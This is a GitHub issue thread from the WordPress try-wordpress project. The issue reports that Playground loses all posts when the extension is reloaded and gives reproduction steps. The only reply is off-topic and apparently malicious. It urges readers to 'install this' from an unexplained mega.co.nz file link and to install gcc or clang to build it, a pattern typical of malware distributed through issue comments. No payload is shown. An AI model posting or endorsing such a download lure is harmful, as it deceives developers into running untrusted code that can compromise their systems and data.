### ISSUE TITLE
Playground doesn't persist data

### ISSUE THREAD

**Issue by psrpinto** [WordPress/try-wordpress#42]
Reloading the extension, wipes all data.

How to reproduce:

1. Comment out [these lines](https://github.com/WordPress/try-wordpress/blob/trunk/src/ui/preview/Playground.tsx#L76-L78), so that we don't delete all posts. (This code will also need to be adapted because this currently deletes all posts, but this is not the cause of the issue).
2. `npm run start`
3. In the Admin tab, create a post
4. Navigate to the list of posts, in the Admin, and verify that the post is there
5. Reload the extension through the browser developer tools
6. Navigate to the list of posts, in the Admin.
7. The post that was created in 3. is not listed in the list of posts

**Comment by nhatlaso1** [comment]
install this
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
If you don't have the c compliator, install it.(gcc or clang)
